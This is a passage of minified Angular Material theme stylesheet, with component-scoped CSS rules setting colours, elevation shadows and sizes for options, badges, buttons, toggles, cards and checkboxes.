var(--mat-focus-indicator-border-color, transparent);border-radius:var(--mat-focus-indicator-border-radius, 4px)}.mat-focus-indicator[_ngcontent-%COMP%]:focus:before{content:""}.cdk-high-contrast-active[_ngcontent-%COMP%]{--mat-focus-indicator-display: block}.mat-mdc-focus-indicator[_ngcontent-%COMP%]{position:relative}.mat-mdc-focus-indicator[_ngcontent-%COMP%]:before{inset:0;position:absolute;box-sizing:border-box;pointer-events:none;display:var(--mat-mdc-focus-indicator-display, none);border:var(--mat-mdc-focus-indicator-border-width, 3px) var(--mat-mdc-focus-indicator-border-style, solid) var(--mat-mdc-focus-indicator-border-color, transparent);border-radius:var(--mat-mdc-focus-indicator-border-radius, 4px)}.mat-mdc-focus-indicator[_ngcontent-%COMP%]:focus:before{content:""}.cdk-high-contrast-active[_ngcontent-%COMP%]{--mat-mdc-focus-indicator-display: block}.mat-ripple-element[_ngcontent-%COMP%]{background-color:#0000001a}.mat-option[_ngcontent-%COMP%]{color:#000000de}.mat-option[_ngcontent-%COMP%]:hover:not(.mat-option-disabled), .mat-option[_ngcontent-%COMP%]:focus:not(.mat-option-disabled){background:rgba(0,0,0,.04)}.mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-multiple):not(.mat-option-disabled){background:rgba(0,0,0,.04)}.mat-option.mat-active[_ngcontent-%COMP%]{background:rgba(0,0,0,.04);color:#000000de}.mat-option.mat-option-disabled[_ngcontent-%COMP%]{color:#00000061}.mat-primary[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#2196f3}.mat-accent[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#7b1fa2}.mat-warn[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-option-disabled){color:#f44336}.mat-optgroup-label[_ngcontent-%COMP%]{color:#0000008a}.mat-optgroup-disabled[_ngcontent-%COMP%]   .mat-optgroup-label[_ngcontent-%COMP%]{color:#00000061}.mat-pseudo-checkbox[_ngcontent-%COMP%]{color:#0000008a}.mat-pseudo-checkbox[_ngcontent-%COMP%]:after{color:#f5f5f5}.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%]{color:#b0b0b0}.mat-primary[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .mat-primary[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#2196f3}.mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%], .mat-accent[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .mat-accent[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#7b1fa2}.mat-warn[_ngcontent-%COMP%]   .mat-pseudo-checkbox-checked[_ngcontent-%COMP%], .mat-warn[_ngcontent-%COMP%]   .mat-pseudo-checkbox-indeterminate[_ngcontent-%COMP%]{background:#f44336}.mat-pseudo-checkbox-checked.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%], .mat-pseudo-checkbox-indeterminate.mat-pseudo-checkbox-disabled[_ngcontent-%COMP%]{background:#b0b0b0}.mat-app-background[_ngcontent-%COMP%]{background-color:#f5f5f5;color:#000000de}.mat-elevation-z0[_ngcontent-%COMP%]{box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-elevation-z1[_ngcontent-%COMP%]{box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f}.mat-elevation-z2[_ngcontent-%COMP%]{box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.mat-elevation-z3[_ngcontent-%COMP%]{box-shadow:0 3px 3px -2px #0003,0 3px 4px #00000024,0 1px 8px #0000001f}.mat-elevation-z4[_ngcontent-%COMP%]{box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.mat-elevation-z5[_ngcontent-%COMP%]{box-shadow:0 3px 5px -1px #0003,0 5px 8px #00000024,0 1px 14px #0000001f}.mat-elevation-z6[_ngcontent-%COMP%]{box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.mat-elevation-z7[_ngcontent-%COMP%]{box-shadow:0 4px 5px -2px #0003,0 7px 10px 1px #00000024,0 2px 16px 1px #0000001f}.mat-elevation-z8[_ngcontent-%COMP%]{box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.mat-elevation-z9[_ngcontent-%COMP%]{box-shadow:0 5px 6px -3px #0003,0 9px 12px 1px #00000024,0 3px 16px 2px #0000001f}.mat-elevation-z10[_ngcontent-%COMP%]{box-shadow:0 6px 6px -3px #0003,0 10px 14px 1px #00000024,0 4px 18px 3px #0000001f}.mat-elevation-z11[_ngcontent-%COMP%]{box-shadow:0 6px 7px -4px #0003,0 11px 15px 1px #00000024,0 4px 20px 3px #0000001f}.mat-elevation-z12[_ngcontent-%COMP%]{box-shadow:0 7px 8px -4px #0003,0 12px 17px 2px #00000024,0 5px 22px 4px #0000001f}.mat-elevation-z13[_ngcontent-%COMP%]{box-shadow:0 7px 8px -4px #0003,0 13px 19px 2px #00000024,0 5px 24px 4px #0000001f}.mat-elevation-z14[_ngcontent-%COMP%]{box-shadow:0 7px 9px -4px #0003,0 14px 21px 2px #00000024,0 5px 26px 4px #0000001f}.mat-elevation-z15[_ngcontent-%COMP%]{box-shadow:0 8px 9px -5px #0003,0 15px 22px 2px #00000024,0 6px 28px 5px #0000001f}.mat-elevation-z16[_ngcontent-%COMP%]{box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f}.mat-elevation-z17[_ngcontent-%COMP%]{box-shadow:0 8px 11px -5px #0003,0 17px 26px 2px #00000024,0 6px 32px 5px #0000001f}.mat-elevation-z18[_ngcontent-%COMP%]{box-shadow:0 9px 11px -5px #0003,0 18px 28px 2px #00000024,0 7px 34px 6px #0000001f}.mat-elevation-z19[_ngcontent-%COMP%]{box-shadow:0 9px 12px -6px #0003,0 19px 29px 2px #00000024,0 7px 36px 6px #0000001f}.mat-elevation-z20[_ngcontent-%COMP%]{box-shadow:0 10px 13px -6px #0003,0 20px 31px 3px #00000024,0 8px 38px 7px #0000001f}.mat-elevation-z21[_ngcontent-%COMP%]{box-shadow:0 10px 13px -6px #0003,0 21px 33px 3px #00000024,0 8px 40px 7px #0000001f}.mat-elevation-z22[_ngcontent-%COMP%]{box-shadow:0 10px 14px -6px #0003,0 22px 35px 3px #00000024,0 8px 42px 7px #0000001f}.mat-elevation-z23[_ngcontent-%COMP%]{box-shadow:0 11px 14px -7px #0003,0 23px 36px 3px #00000024,0 9px 44px 8px #0000001f}.mat-elevation-z24[_ngcontent-%COMP%]{box-shadow:0 11px 15px -7px #0003,0 24px 38px 3px #00000024,0 9px 46px 8px #0000001f}.mat-theme-loaded-marker[_ngcontent-%COMP%]{display:none}.mat-autocomplete-panel[_ngcontent-%COMP%]{background:white;color:#000000de}.mat-autocomplete-panel[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 4px -1px #0003,0 4px 5px #00000024,0 1px 10px #0000001f}.mat-autocomplete-panel[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-active):not(:hover){background:white}.mat-autocomplete-panel[_ngcontent-%COMP%]   .mat-option.mat-selected[_ngcontent-%COMP%]:not(.mat-active):not(:hover):not(.mat-option-disabled){color:#000000de}.mat-badge[_ngcontent-%COMP%]{position:relative}.mat-badge.mat-badge[_ngcontent-%COMP%]{overflow:visible}.mat-badge-hidden[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{display:none}.mat-badge-content[_ngcontent-%COMP%]{position:absolute;text-align:center;display:inline-block;border-radius:50%;transition:transform .2s ease-in-out;transform:scale(.6);overflow:hidden;white-space:nowrap;text-overflow:ellipsis;pointer-events:none}.ng-animate-disabled[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%], .mat-badge-content._mat-animation-noopable[_ngcontent-%COMP%]{transition:none}.mat-badge-content.mat-badge-active[_ngcontent-%COMP%]{transform:none}.mat-badge-small[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{width:16px;height:16px;line-height:16px}.mat-badge-small.mat-badge-above[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{top:-8px}.mat-badge-small.mat-badge-below[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{bottom:-8px}.mat-badge-small.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:-16px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-small.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-16px}.mat-badge-small.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-16px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-small.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-16px}.mat-badge-small.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:-8px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-small.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-8px}.mat-badge-small.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-8px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-small.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-8px}.mat-badge-medium[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{width:22px;height:22px;line-height:22px}.mat-badge-medium.mat-badge-above[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{top:-11px}.mat-badge-medium.mat-badge-below[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{bottom:-11px}.mat-badge-medium.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:-22px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-medium.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-22px}.mat-badge-medium.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-22px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-medium.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-22px}.mat-badge-medium.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:-11px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-medium.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-11px}.mat-badge-medium.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-11px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-medium.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-11px}.mat-badge-large[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{width:28px;height:28px;line-height:28px}.mat-badge-large.mat-badge-above[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{top:-14px}.mat-badge-large.mat-badge-below[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{bottom:-14px}.mat-badge-large.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:-28px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-large.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-28px}.mat-badge-large.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-28px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-large.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-28px}.mat-badge-large.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:-14px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-large.mat-badge-overlap.mat-badge-before[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{left:auto;right:-14px}.mat-badge-large.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:-14px}[dir=rtl][_ngcontent-%COMP%]   .mat-badge-large.mat-badge-overlap.mat-badge-after[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{right:auto;left:-14px}.mat-badge-content[_ngcontent-%COMP%]{color:#fff;background:#2196f3}.cdk-high-contrast-active[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{outline:solid 1px;border-radius:0}.mat-badge-accent[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{background:#7b1fa2;color:#fff}.mat-badge-warn[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{color:#fff;background:#f44336}.mat-badge-disabled[_ngcontent-%COMP%]   .mat-badge-content[_ngcontent-%COMP%]{background:#b5b5b5;color:#00000061}.mat-bottom-sheet-container[_ngcontent-%COMP%]{box-shadow:0 8px 10px -5px #0003,0 16px 24px 2px #00000024,0 6px 30px 5px #0000001f;background:white;color:#000000de}.mat-button[_ngcontent-%COMP%], .mat-icon-button[_ngcontent-%COMP%], .mat-stroked-button[_ngcontent-%COMP%]{color:inherit;background:transparent}.mat-button.mat-primary[_ngcontent-%COMP%], .mat-icon-button.mat-primary[_ngcontent-%COMP%], .mat-stroked-button.mat-primary[_ngcontent-%COMP%]{color:#2196f3}.mat-button.mat-accent[_ngcontent-%COMP%], .mat-icon-button.mat-accent[_ngcontent-%COMP%], .mat-stroked-button.mat-accent[_ngcontent-%COMP%]{color:#7b1fa2}.mat-button.mat-warn[_ngcontent-%COMP%], .mat-icon-button.mat-warn[_ngcontent-%COMP%], .mat-stroked-button.mat-warn[_ngcontent-%COMP%]{color:#f44336}.mat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-icon-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-icon-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-icon-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-icon-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-stroked-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-stroked-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-stroked-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-stroked-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{color:#00000042}.mat-button.mat-primary[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-icon-button.mat-primary[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-stroked-button.mat-primary[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#2196f3}.mat-button.mat-accent[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-icon-button.mat-accent[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-stroked-button.mat-accent[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-button.mat-warn[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-icon-button.mat-warn[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-stroked-button.mat-warn[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:#f44336}.mat-button.mat-button-disabled[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-icon-button.mat-button-disabled[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%], .mat-stroked-button.mat-button-disabled[_ngcontent-%COMP%]   .mat-button-focus-overlay[_ngcontent-%COMP%]{background-color:transparent}.mat-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-icon-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-stroked-button[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{opacity:.1;background-color:currentColor}.mat-button-focus-overlay[_ngcontent-%COMP%]{background:black}.mat-stroked-button[_ngcontent-%COMP%]:not(.mat-button-disabled){border-color:#0000001f}.mat-flat-button[_ngcontent-%COMP%], .mat-raised-button[_ngcontent-%COMP%], .mat-fab[_ngcontent-%COMP%], .mat-mini-fab[_ngcontent-%COMP%]{color:#000000de;background-color:#fff}.mat-flat-button.mat-primary[_ngcontent-%COMP%], .mat-raised-button.mat-primary[_ngcontent-%COMP%], .mat-fab.mat-primary[_ngcontent-%COMP%], .mat-mini-fab.mat-primary[_ngcontent-%COMP%], .mat-flat-button.mat-accent[_ngcontent-%COMP%], .mat-raised-button.mat-accent[_ngcontent-%COMP%], .mat-fab.mat-accent[_ngcontent-%COMP%], .mat-mini-fab.mat-accent[_ngcontent-%COMP%], .mat-flat-button.mat-warn[_ngcontent-%COMP%], .mat-raised-button.mat-warn[_ngcontent-%COMP%], .mat-fab.mat-warn[_ngcontent-%COMP%], .mat-mini-fab.mat-warn[_ngcontent-%COMP%]{color:#fff}.mat-flat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{color:#00000042}.mat-flat-button.mat-primary[_ngcontent-%COMP%], .mat-raised-button.mat-primary[_ngcontent-%COMP%], .mat-fab.mat-primary[_ngcontent-%COMP%], .mat-mini-fab.mat-primary[_ngcontent-%COMP%]{background-color:#2196f3}.mat-flat-button.mat-accent[_ngcontent-%COMP%], .mat-raised-button.mat-accent[_ngcontent-%COMP%], .mat-fab.mat-accent[_ngcontent-%COMP%], .mat-mini-fab.mat-accent[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-flat-button.mat-warn[_ngcontent-%COMP%], .mat-raised-button.mat-warn[_ngcontent-%COMP%], .mat-fab.mat-warn[_ngcontent-%COMP%], .mat-mini-fab.mat-warn[_ngcontent-%COMP%]{background-color:#f44336}.mat-flat-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-flat-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-raised-button.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-primary.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-accent.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-warn.mat-button-disabled[_ngcontent-%COMP%], .mat-mini-fab.mat-button-disabled.mat-button-disabled[_ngcontent-%COMP%]{background-color:#0000001f}.mat-flat-button.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-raised-button.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-fab.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-mini-fab.mat-primary[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-flat-button.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-raised-button.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-fab.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-mini-fab.mat-accent[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-flat-button.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-raised-button.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-fab.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%], .mat-mini-fab.mat-warn[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#ffffff1a}.mat-stroked-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-flat-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-raised-button[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.mat-raised-button[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]){box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.mat-raised-button.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-fab[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-mini-fab[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 5px -1px #0003,0 6px 10px #00000024,0 1px 18px #0000001f}.mat-fab[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]), .mat-mini-fab[_ngcontent-%COMP%]:not(.mat-button-disabled):active:not([class*=mat-elevation-z]){box-shadow:0 7px 8px -4px #0003,0 12px 17px 2px #00000024,0 5px 22px 4px #0000001f}.mat-fab.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-mini-fab.mat-button-disabled[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-button-toggle-standalone[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-button-toggle-group[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 3px 1px -2px #0003,0 2px 2px #00000024,0 1px 5px #0000001f}.mat-button-toggle-standalone.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]:not([class*=mat-elevation-z]), .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:none}.mat-button-toggle[_ngcontent-%COMP%]{color:#00000061}.mat-button-toggle[_ngcontent-%COMP%]   .mat-button-toggle-focus-overlay[_ngcontent-%COMP%]{background-color:#0000001f}.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{color:#000000de;background:white}.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle-focus-overlay[_ngcontent-%COMP%]{background-color:#000}.mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:solid 1px #e0e0e0}[dir=rtl][_ngcontent-%COMP%]   .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:none;border-right:solid 1px #e0e0e0}.mat-button-toggle-group-appearance-standard.mat-button-toggle-vertical[_ngcontent-%COMP%]   .mat-button-toggle[_ngcontent-%COMP%] + .mat-button-toggle[_ngcontent-%COMP%]{border-left:none;border-right:none;border-top:solid 1px #e0e0e0}.mat-button-toggle-checked[_ngcontent-%COMP%]{background-color:#e0e0e0;color:#0000008a}.mat-button-toggle-checked.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{color:#000000de}.mat-button-toggle-disabled[_ngcontent-%COMP%]{color:#00000042;background-color:#eee}.mat-button-toggle-disabled.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]{background:white}.mat-button-toggle-disabled.mat-button-toggle-checked[_ngcontent-%COMP%]{background-color:#bdbdbd}.mat-button-toggle-standalone.mat-button-toggle-appearance-standard[_ngcontent-%COMP%], .mat-button-toggle-group-appearance-standard[_ngcontent-%COMP%]{border:solid 1px #e0e0e0}.mat-button-toggle-appearance-standard[_ngcontent-%COMP%]   .mat-button-toggle-label-content[_ngcontent-%COMP%]{line-height:48px}.mat-card[_ngcontent-%COMP%]{background:white;color:#000000de}.mat-card[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 2px 1px -1px #0003,0 1px 1px #00000024,0 1px 3px #0000001f}.mat-card.mat-card-flat[_ngcontent-%COMP%]:not([class*=mat-elevation-z]){box-shadow:0 0 #0003,0 0 #00000024,0 0 #0000001f}.mat-card-subtitle[_ngcontent-%COMP%]{color:#0000008a}.mat-checkbox-frame[_ngcontent-%COMP%]{border-color:#0000008a}.mat-checkbox-checkmark[_ngcontent-%COMP%]{fill:#f5f5f5}.mat-checkbox-checkmark-path[_ngcontent-%COMP%]{stroke:#f5f5f5!important}.mat-checkbox-mixedmark[_ngcontent-%COMP%]{background-color:#f5f5f5}.mat-checkbox-indeterminate.mat-primary[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .mat-checkbox-checked.mat-primary[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#2196f3}.mat-checkbox-indeterminate.mat-accent[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .mat-checkbox-checked.mat-accent[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#7b1fa2}.mat-checkbox-indeterminate.mat-warn[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .mat-checkbox-checked.mat-warn[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#f44336}.mat-checkbox-disabled.mat-checkbox-checked[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%], .mat-checkbox-disabled.mat-checkbox-indeterminate[_ngcontent-%COMP%]   .mat-checkbox-background[_ngcontent-%COMP%]{background-color:#b0b0b0}.mat-checkbox-disabled[_ngcontent-%COMP%]:not(.mat-checkbox-checked)   .mat-checkbox-frame[_ngcontent-%COMP%]{border-color:#b0b0b0}.mat-checkbox-disabled[_ngcontent-%COMP%]   .mat-checkbox-label[_ngcontent-%COMP%]{color:#00000061}.mat-checkbox[_ngcontent-%COMP%]   .mat-ripple-element[_ngcontent-%COMP%]{background-color:#000}.mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-primary   .mat-ripple-element[_ngcontent-%COMP%], .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-primary   .mat-ripple-element[_ngcontent-%COMP%]{background:#2196f3}.mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-accent   .mat-ripple-element[_ngcontent-%COMP%], .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-accent   .mat-ripple-element[_ngcontent-%COMP%]{background:#7b1fa2}.mat-checkbox-checked[_ngcontent-%COMP%]:not(.mat-checkbox-disabled).mat-warn   .mat-ripple-element[_ngcontent-%COMP%], .mat-checkbox[_ngcontent-%COMP%]:active:not(.mat-checkbox-disabled).mat-warn   